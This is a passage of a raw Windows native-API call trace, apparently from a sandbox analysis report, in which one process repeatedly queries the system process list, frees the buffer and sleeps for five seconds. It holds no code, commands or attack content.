returned 0x0 [0225.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.986] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.993] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.029] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.072] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.107] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, 